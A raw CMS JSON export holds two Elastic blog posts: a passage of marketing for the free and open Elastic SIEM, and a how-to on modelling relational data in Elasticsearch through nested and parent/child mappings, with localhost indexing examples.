operating from unsecured environments, on personal or repurposed equipment, and following processes that might not have been carefully reviewed or tested.\u003c/p\u003e\u003ch2\u003eWhat is Elastic SIEM?\u003c/h2\u003e\u003cp\u003eThe free and open \u003ca href=\"https://www.elastic.co/siem\" target=\"_self\"\u003eElastic SIEM\u003c/a\u003e is an application that provides security teams with visibility, threat hunting, automated detection, and Security Operations Center (SOC) workflows. Elastic SIEM is included in the default distribution of the most successful logging platform, Elastic (ELK) Stack software. It ships with out-of-the-box detection rules aligned with the MITRE ATT\u0026amp;CK™ framework to surface threats often missed by other tools. Created, maintained, and kept up-to-date by the security experts at Elastic, these rules automatically detect and address the latest threat activity. Severity and risk scores associated with signals generated by the detection rules enable analysts to rapidly triage issues and turn their attention to the highest-risk work. If you need to deploy a \u003ca href=\"https://www.elastic.co/what-is/siem\" target=\"_self\"\u003eSIEM solution\u003c/a\u003e today and see immediate value, we provide the best and easiest way to do it.\u003c/p\u003e\u003cp\u003eElastic SIEM packs a lot of power. Built with the speed and scalability of Elasticsearch as its underlying search platform, it maintains analyst velocity with:\u003c/p\u003e\u003cul\u003e\u003cli\u003eAn overview page to show SOC status and security posture\u003c/li\u003e\u003cli\u003eDashboards for threat hunting and situational awareness\u0026nbsp;\u003c/li\u003e\u003cli\u003eIntegration with Elastic Maps, Elastic Lens, and the rest of Kibana\u003c/li\u003e\u003cli\u003eA detection engine for automated detection\u0026nbsp;\u003c/li\u003e\u003cli\u003eA unique timeline investigator with investigation templates for analysts\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eOrganizations use these capabilities to eliminate blind spots and arm analysts to drive down mean time to detect (MTTD) and mean time to respond (MTTR).\u0026nbsp;\u003c/p\u003e\u003cdiv class=\"video embed-container\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/k5GtNGY1qR8HbAoLLgvvP8.jpg\" data-uuid=\"k5GtNGY1qR8HbAoLLgvvP8\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-disable_analytics=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" width=\"692\"/\u003e\u003c/div\u003e\u003ch2\u003eWhy free SIEM?\u003c/h2\u003e\u003cp\u003eElastic is on a mission to help organizations improve their security posture by eliminating blind spots and arming their analysts with the products and workflows they need to protect data and infrastructure. Spurred by the security community’s widespread adoption of the Elastic Stack for threat hunting, fraud detection, and security monitoring, we wanted to make it even easier for users to deploy our products for security. We first worked in collaboration with our community to develop \u003ca href=\"https://www.elastic.co/guide/en/ecs/1.5/index.html\" target=\"_self\"\u003eElastic Common Schema\u003c/a\u003e (ECS), which streamlines the normalization of data from disparate sources — whether from network and host technologies or cloud infrastructure and applications. We launched Elastic SIEM in June 2019, introducing the industry’s only free and open SIEM packaged with actively maintained SIEM detection rules.\u0026nbsp;\u003c/p\u003e\u003cp\u003eWe demonstrated the latest Elastic SIEM capabilities to dozens of visitors at our RSA 2020 conference booth in San Francisco.\u0026nbsp;After nearly every demo, when asked about the licensing costs, we\u0026nbsp;were pleased to be able to answer that everything we’d just showed was free and open to use. “Wait, you mean a trial?” “No, forever.” “Really?” “Yes.”\u003c/p\u003e\u003ch3\u003eGet started and deploy at scale for free\u003c/h3\u003e\u003cp\u003eFree and open might be new to SIEM, but it is not new to Elastic. For years, organizations have built \u003ca href=\"https://www.elastic.co/security/siem\" target=\"_self\"\u003esecurity analytics\u003c/a\u003e projects for threat hunting and SIEM on the Elastic Stack. They have enjoyed unlimited scale, unlimited-duration proofs of concept with no licensing cost, and none of the vendor headaches usually associated with evaluating new enterprise software. We’re building on this with Elastic SIEM, which is available for download to run on-premises, in a virtual or containerized environment, or in your cloud or ours.\u003c/p\u003e\u003ch3\u003eResource-based pricing for commercial extensions\u003c/h3\u003e\u003cp\u003eThe free and open Elastic SIEM provides a solid base for SOC operations to use at any scale and for as long as they need it. Elastic also provides commercial extensions to Elastic SIEM that take it to the next level, including integration of machine learning-based anomaly detection, external alert notifications, and integration with third-party case/ticket management platforms, incident response systems, and SOAR platforms.\u003c/p\u003e\u003cp\u003eSIEM vendors typically charge their customers based on data ingestion rate, such as average events per second (EPS) or daily indexed volume (DIV). This licensing model has several drawbacks. First, it creates a financial disincentive for organizations to collect and ingest the data that might actually help them detect threats more effectively. Second, it creates a situation where some security data is “dropped on the floor” or sent to another storage area where special processes need to be invoked to ever look at it. Third, it creates an unpredictable and uncomfortable budgeting situation for these organizations planning for expansion of data.\u003c/p\u003e\u003cp\u003eIn contrast, our \u003ca href=\"https://www.elastic.co/pricing/philosophy\" target=\"_self\"\u003eresource-based pricing\u003c/a\u003e does not charge by data ingestion rate, nor by seat. Instead, it allows you to pay only for what you use in terms of resources supporting your security operations. You get to choose how much data you ingest, how long you retain it, and what kind of security workflows you enable on the data.\u003c/p\u003e\u003ch2\u003eWhy open SIEM?\u003c/h2\u003e\u003cp\u003eWhat do we mean by open? It’s way more than just “open source” or “open code,” which have defined a new age of disruptive approaches to SIEM. Our users value the open community, open roadmap, open data model, and an open approach to detections.\u003c/p\u003e\u003ch3\u003eOpen community\u003c/h3\u003e\u003cp\u003eOne of the things that users tell us they love about Elastic from both a cultural and technological perspective is the community. If you have any questions, the Elastic community’s got your back. When it comes to SIEM, our team members answer user questions daily on the \u003ca href=\"https://discuss.elastic.co/c/siem\" target=\"_self\"\u003eSIEM Discuss Forum\u003c/a\u003e and in our \u003ca href=\"https://elasticstack.slack.com\" target=\"_self\"\u003epublic #siem Slack channel\u003c/a\u003e, as well as in other places we engage with users.\u0026nbsp;\u003c/p\u003e\u003cp\u003eCommunity is especially critical in cybersecurity. The security space isn't about a single tool or individual, but rather how teams collaborate across organizations, geographies, datasets, and practices to protect valuable data and infrastructures against threats. With Elastic SIEM, Elastic actively fosters this security community — whether through our products, partnerships, sponsorships, training, or the amazing original research coming out of the Elastic community itself.\u003c/p\u003e\u003cp\u003eMany organizations have used Elastic as their security analytics platform and home-baked SIEM solution for years. For example, SANS, one of the leaders in security training and certification, has long used \u003ca href=\"https://www.sans.org/course/siem-with-tactical-analytics/course/desc/community\" target=\"_self\"\u003eElasticsearch as a training platform for SIEM\u003c/a\u003e, not to mention the many other tools and training programs that leverage Elastic for threat hunting, insider threat, and fraud detection.\u003c/p\u003e\u003ch3\u003eOpen roadmap\u003c/h3\u003e\u003cp\u003eAnother powerful aspect of open development practices that we’ve adopted is an open roadmap and issue tracker. Whether you are just trying to figure out what we are focused on or chasing down a specific enhancement request, you can just jump into the \u003ca href=\"https://github.com/elastic/kibana/issues?q=is%3Aopen+is%3Aissue+label%3ATeam%3ASIEM\" target=\"_self\"\u003epublic Github issues\u003c/a\u003e, start educating yourself, upvote topics, and file new ones. You’ll see our designs for future directions completely in the open, as well as our engineers engaging in triaging and getting more details on your ideas. We also accept contributions, which is another way to move the needle.\u003c/p\u003e\u003ch3\u003eOpen data model\u003c/h3\u003e\u003cp\u003eIn the Elastic Stack, every piece of information you add is “just another index” in our open data model. Data is stored as JSON, with no proprietary formats. We clearly document our schema assumptions in \u003ca href=\"https://www.elastic.co/guide/en/ecs/1.5/index.html\" target=\"_self\"\u003eECS\u003c/a\u003e, which is community-driven and extensible. This means no vendor lock-in.\u0026nbsp;\u003c/p\u003e\u003cp\u003eElastic SIEM includes “inspect” functions so you can see the actual queries used by the app. Our SIEM rules are published and fully \u003ca href=\"https://www.elastic.co/guide/en/siem/guide/current/prebuilt-rules.html\" target=\"_self\"\u003edocumented\u003c/a\u003e, so you can see and understand the detection logic — no “black box” detections here. Even our machine learning-based anomaly detection jobs are readily viewable and can be copied and edited to create your own custom jobs. Want to add another data source to SIEM? No problem. On top of that, we never rate-limit your ability to get data out; it’s your data and you have the control.\u003c/p\u003e\u003ch2\u003eTry it for yourself\u003c/h2\u003e\u003cp\u003eWant to give Elastic SIEM a spin? Try Elastic SIEM on \u003ca href=\"https://www.elastic.co/cloud/elasticsearch-service/signup\" target=\"_self\"\u003eElasticsearch Service\u003c/a\u003e on Elastic Cloud, or check out an \u003ca href=\"https://demo.elastic.co/app/siem#/overview?_g=()\u0026timerange=(global:(linkTo:!(timeline),timerange:(from:1580667870898,fromStr:now-24h,kind:relative,to:1580754270898,toStr:now)),timeline:(linkTo:!(global),timerange:(from:1580667870898,fromStr:now-24h,kind:relative,to:1580754270898,toStr:now)))\" target=\"_self\"\u003eElastic SIEM demo\u003c/a\u003e. Already have \u003ca href=\"https://www.elastic.co/blog/migrating-to-elastic-common-schema-in-beats-environments\" target=\"_self\"\u003eECS\u003c/a\u003e-formatted data format in Elasticsearch? Just upgrade to 7.6 of the \u003ca href=\"https://www.elastic.co/downloads/\" target=\"_self\"\u003eElastic Stack\u003c/a\u003e to get your SOC rolling.\u003c/p\u003e\u003cp\u003eWant to experience Elastic Security live? Virtually participate in an \u003ca href=\"https://www.elastic.co/elasticon/\" target=\"_self\"\u003eElastic{ON} Tour\u003c/a\u003e event.\u003c/p\u003e\u003cp\u003eLearn more about SIEM with the \u003ca href=\"https://www.elastic.co/what-is/siem\" target=\"_self\"\u003eSIEM Overview Guide\u003c/a\u003e.\u003c/p\u003e","category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2020-03-26T12:01:00.480Z","created_by":"blt5acab36271aec2288a4b6563","disclaimer":["blta06a046e82d04210"],"full_bleed_image":{"_version":3,"is_dir":false,"uid":"bltcd0cda3eaff59182","ACL":{},"content_type":"image/png","created_at":"2019-11-20T22:50:48.620Z","created_by":"blt14b9d68562bd17cc","description":"","file_size":"44434","filename":"blog-banner-release-security.png","parent_uid":null,"tags":[],"title":"blog-banner-release-security.png","updated_at":"2021-01-12T20:34:53.426Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:21.961Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcd0cda3eaff59182/5ffe07edd4e6c3463b9178a2/blog-banner-release-security.png"},"markdown_l10n":"","product":["siem"],"publish_date":"2020-03-26T19:00:00.000Z","seo":{"seo_title_l10n":"Elastic SIEM: free and open for security analysts everywhere","seo_description_l10n":"With free and open Elastic SIEM, Elastic continues its mission to help organizations improve their security posture. Eliminate blind spots and arm analysts with the tools and workflows they need to protect data and infrastructure.","canonical_tag":"","og_markup":{"facebook_profile_id":""},"noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt47414afcde70b058","ACL":{},"created_at":"2023-11-06T20:43:45.793Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"open-security","label_l10n":"Open security","tags":[],"title":"Open security","updated_at":"2023-11-06T20:43:45.793Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:27.618Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":3,"is_dir":false,"uid":"blt69323019f723d794","ACL":{},"content_type":"image/png","created_at":"2019-11-20T22:50:37.804Z","created_by":"blt14b9d68562bd17cc","description":"","file_size":"36011","filename":"blog-thumb-release-security.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-release-security.png","updated_at":"2022-02-11T21:04:06.001Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-24T16:51:51.495Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt69323019f723d794/5ffe0811f093203f68d42e54/blog-thumb-release-security.png"},"title":"Elastic SIEM is free and open for security analysts everywhere","title_l10n":"Elastic SIEM is free and open for security analysts everywhere","updated_at":"2024-09-18T14:50:23.415Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-siem-free-open","versions":["7.2","7.3","7.4","7.5","7.6"],"publish_details":{"time":"2024-09-18T14:50:29.191Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt17044aa79b7df7c2","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt4f911b4247a9427a"],"body_l10n":"\u003cp\u003eData in the real world is rarely simple - often times it is a jumble of interlocking relations.\u003c/p\u003e\u003cp\u003eHow do you represent relational data in Elasticsearch? There are a few mechanisms that can be used to provide relation support. Each has their pros and cons, making them useful for different situations.\u003c/p\u003e\u003ch3\u003eInner Objects\u003c/h3\u003e\u003cp\u003eThe simplest mechanism are named \"inner objects\". These are JSON objects embedded inside your parent document:\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"name\":\"Zach\",\u003cbr /\u003e \"car\":{\u003cbr /\u003e \"make\":\"Saturn\",\u003cbr /\u003e \"model\":\"SL\"\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eSimple, right? The \"car\" field is just another JSON object, with the inner object having two properties (\"make\" and \"model\"). This inner object mapping will work as long as you have a one-to-one relationship between the root object and the inner object. E.g. every person has at most one \"car\".\u003c/p\u003e\u003cp\u003eBut what if Zach owns two cars, and we add another person (Bob) who owns just one car?\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"name\" : \"Zach\",\u003cbr /\u003e \"car\" : [\u003cbr /\u003e {\u003cbr /\u003e \"make\" : \"Saturn\",\u003cbr /\u003e \"model\" : \"SL\"\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"make\" : \"Subaru\",\u003cbr /\u003e \"model\" : \"Imprezza\"\u003cbr /\u003e }\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e{\u003cbr /\u003e \"name\" : \"Bob\",\u003cbr /\u003e \"car\" : [\u003cbr /\u003e {\u003cbr /\u003e \"make\" : \"Saturn\",\u003cbr /\u003e \"model\" : \"Imprezza\"\u003cbr /\u003e }\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eIgnoring the fact that Saturn never made an Imprezza car, what happens when we try to search for it? Logically, only Bob has a \"Saturn Imprezza\", so we should be able to do a query like:\u003c/p\u003e\u003cp\u003e`query: car.make=Saturn AND car.model=Imprezza`\u003c/p\u003e\u003cp\u003eRight? \u003cstrong\u003eWell, no, that doesn't work\u003c/strong\u003e. If you perform that query, you'll receive both documents as the result. What happens is that Elasticsearch internally flattens inner objects into a single object. So Zach's entry \u003cem\u003eactually\u003c/em\u003e looks like this:\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"name\" : \"Zach\",\u003cbr /\u003e \"car.make\" : [\"Saturn\", \"Subaru\"]\u003cbr /\u003e \"car.model\" : [\"SL\", \"Imprezza\"]\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWhich explains why it was returned as a result. Elasticsearch is fundamentally flat, so internally the documents are represented as flattened fields. Hmm.\u003c/p\u003e\u003ch3\u003eNested\u003c/h3\u003e\u003cp\u003eAs an alternative to inner objects, Elasticsearch provides the concept of \" \u003ca href=\"https://www.elastic.co/guide/reference/mapping/nested-type.html\"\u003enested types\u003c/a\u003e\". Nested documents look identical to inner objects at the document level, but provide the functionality we were missing above (as well as some limitations).\u003c/p\u003e\u003cp\u003eExample nested document:\u003cbr /\u003e\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"name\" : \"Zach\",\u003cbr /\u003e \"car\" : [\u003cbr /\u003e {\u003cbr /\u003e \"make\" : \"Saturn\",\u003cbr /\u003e \"model\" : \"SL\"\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"make\" : \"Subaru\",\u003cbr /\u003e \"model\" : \"Imprezza\"\u003cbr /\u003e }\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eAt the mapping level, nested types must be explicitly declared (unlike inner objects, which are automatically detected):\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"person\":{\u003cbr /\u003e \"properties\":{\u003cbr /\u003e \"name\" : {\u003cbr /\u003e \"type\" : \"string\"\u003cbr /\u003e },\u003cbr /\u003e \"car\":{\u003cbr /\u003e \"type\" : \"nested\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eThe problem with inner objects was that each nested JSON object is not treated as an individual component of the document. Instead they were merged with other inner objects sharing the same property names.\u003c/p\u003e\u003cp\u003eThis is not the case with nested documents. Each nested doc remains independent, and you can perform a query like `car.make=Saturn AND car.model=Imprezza` without a problem.\u003c/p\u003e\u003cp\u003eElasticsearch is still fundamentally flat, but it manages the nested relation internally to give the appearance of nested hierarchy. When you create a nested document, Elasticsearch actually indexes two separate documents (root object and nested object), then relates the two internally. Both docs are stored in the same Lucene block on the same Shard, so read performance is still very fast.\u003c/p\u003e\u003cp\u003eThis arrangement does come with some disadvantages. Most obvious, you can only access these nested documents using a special ` \u003ca href=\"https://www.elastic.co/guide/reference/query-dsl/nested-query.html\"\u003enested query\u003c/a\u003e`. Another big disadvantage comes when you need to update the document, either the root or any of the objects.\u003c/p\u003e\u003cp\u003eSince the docs are all stored in the same Lucene block, and Lucene never allows random write access to it's segments, updating one field in the nested doc will force a reindex of the \u003cem\u003eentire\u003c/em\u003e document.\u003c/p\u003e\u003cp\u003eThis includes the root and any other nested objects, even if they were not modified. Internally, ES will mark the old document as deleted, update the field and then reindex everything into a new Lucene block. If your data changes often, nested documents can have a non-negligible overhead associated with reindexing.\u003c/p\u003e\u003cp\u003eLastly, it is not possible to \"cross reference\" between nested documents. One nested doc cannot \"see\" another nested doc's properties. For example, you are not able to filter on \"A.name\" but facet on \"B.age\". You can get around this by using `include_in_root`, which effectively copies the nested docs into the root, but this get's you back to the problems of inner objects.\u003c/p\u003e\u003ch3\u003eParent/Child\u003c/h3\u003e\u003cp\u003eThe last method that Elasticsearch provides are \u003ca href=\"https://www.elastic.co/guide/reference/mapping/parent-field.html\"\u003eParent/Child types\u003c/a\u003e. This scheme is a looser coupling than nested, and gives you a set of slightly more powerful queries. Let's look at an example where a single person has multiple homes (in different states). Your parent has a mapping as usual, perhaps:\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"mappings\":{\u003cbr /\u003e \"person\":{\u003cbr /\u003e \"name\":{\u003cbr /\u003e \"type\":\"string\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWhile your children have their own mapping outside the parent, with a special `_parent` property set:\u003cbr /\u003e\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e{\u003cbr /\u003e \"homes\":{\u003cbr /\u003e \"_parent\":{\u003cbr /\u003e \"type\" : \"person\"\u003cbr /\u003e },\u003cbr /\u003e \"state\" : {\u003cbr /\u003e \"type\" : \"string\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eThe `_parent` field tells Elasticsearch that the \"Employers\" type is a child of the \"Person\" type. Adding documents to this scheme is very easy. The parent doc is indexed as normal:\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e$ curl -XPUT localhost:9200/test/person/zach/ -d'\u003cbr /\u003e{\u003cbr /\u003e \"name\" : \"Zach\"\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eAnd indexing children documents is \u003cem\u003ealmost\u003c/em\u003e like normal, except you need to specify which parent this child belongs to in the query parameter ('zach' in this case, which is the ID that we used in the above document):\u003cbr /\u003e\u003c/p\u003e\u003cpre class=\"prettyprint noescape\"\u003e$ curl -XPOST localhost:9200/homes?parent=zach -d'\u003cbr /\u003e{\u003cbr /\u003e \"state\" : \"Ohio\"\u003cbr /\u003e}\u003cbr /\u003e$ curl -XPOST localhost:9200/test/homes?parent=zach -d'\u003cbr /\u003e{\u003cbr /\u003e \"state\" : \"South Carolina\"\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eBoth of these documents are now associated with the 'zach' parent document, which allows you to use special queries such as:\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-has-parent-query.html\" target=\"_self\"\u003eHas Parent Query\u003c/a\u003e, which works on parent documents and return children.\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-has-child-query.html\" target=\"_self\"\u003eHas Child Query\u003c/a\u003e, which works on children documents and returns parents\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eYou can also query the parents or children types individually, since they are first-class types and will respond to normal queries as usual (you just can't use the relationship values).\u003c/p\u003e\u003cp\u003eThe big problem with Nested was their storage: everything is stored in the same Lucene block. Parent/Child removes this limitation by separating the two documents and only loosely coupling them. There are some pros and cons to this. The loose coupling means you are more free to update/delete children docs, since they have no effect on the parent or other children.\u003c/p\u003e\u003cp\u003eThe downside is that Parent/Child are slightly less performant than Nested. The children docs are routed to the same shard as the parent, so they will still benefit from shard-level caches and memory filtering. But they aren't quite as fast as nested since they are not colocated in the same Lucene block. There is also a bit more memory overhead, since ElasticSearch needs to keep an in-memory \"join table\", which manages the relations.\u003c/p\u003e\u003cp\u003eLastly, you'll run into situations where sorting or scoring are, frankly, very difficult. For example, it is impossible to tell \u003cem\u003ewhich\u003c/em\u003e child documents matched your `Has_Child` filter, just that one of the docs of the returned parent matched the criteria. This can be frustrating depending on your use-case.\u003c/p\u003e\u003ch3\u003eDenormalization\u003c/h3\u003e\u003cp\u003eSometimes the best option is to simply denormalize your data where appropriate. The relational facilities that Elasticsearch provides are great for certain scenarios...but were never meant to provide the robust relational features that you expect from an RDBM.\u003c/p\u003e\u003cp\u003eAt it's heart, Elasticsearch is a flat hierarchy and trying to force relational data into it can be very challenging. Sometimes the best solution is to judiciously choose which data to denormalize, and where a second query to retrieve children is acceptable. Denormalization gives you arguably the most power and flexibility.\u003c/p\u003e\u003cp\u003eOf course, this comes with the burden of administrative overhead. \u003cem\u003eYou\u003c/em\u003e get to manage relations, and \u003cem\u003eyou\u003c/em\u003e get to perform the required queries/filters to associate the various types. Yay!\u003c/p\u003e\u003ch3\u003eConclusion and Recap\u003c/h3\u003e\u003cp\u003eThis turned into a long, wordy article, so here is a bulletted recap:\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eInner Object\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eEasy, fast, performant\u003c/li\u003e\u003cli\u003eOnly applicable when one-to-one relationships are maintained\u003c/li\u003e\u003cli\u003eNo need for special queries\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003eNested\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eNested docs are stored in the same Lucene block as each other, which helps read/query performance. Reading a nested doc is faster than the equivalent parent/child.\u003c/li\u003e\u003cli\u003eUpdating a single field in a nested document (parent or nested children) forces ES to reindex the entire nested document. This can be very expensive for large nested docs\u003c/li\u003e\u003cli\u003e\"Cross referencing\" nested documents is impossible\u003c/li\u003e\u003cli\u003eBest suited for data that does not change frequently\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003eParent/Child\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eChildren are stored separately from the parent, but are routed to the same shard. So parent/children are slightly less performance on read/query than nested\u003c/li\u003e\u003cli\u003eParent/child mappings have a bit extra memory overhead, since ES maintains a \"join\" list in memory\u003c/li\u003e\u003cli\u003eUpdating a child doc does not affect the parent or any other children, which can potentially save a lot of indexing on large docs\u003c/li\u003e\u003cli\u003eSorting/scoring can be difficult with Parent/Child since the Has Child/Has Parent operations can be opaque at times\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003eDenormalization\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eYou get to manage all the relations yourself!\u003c/li\u003e\u003cli\u003eMost flexible, most administrative overhead\u003c/li\u003e\u003cli\u003eMay be more or less performant depending on your setup\u003c/li\u003e\u003c/ul\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T12:54:57.883Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":null,"markdown_l10n":"","product":["elasticsearch"],"publish_date":"2013-02-20T20:14:42.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"","og_markup":{"facebook_profile_id":""},"canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"uid":"blt4a47bf681100e8ca","title":"Log management","label_l10n":"Log 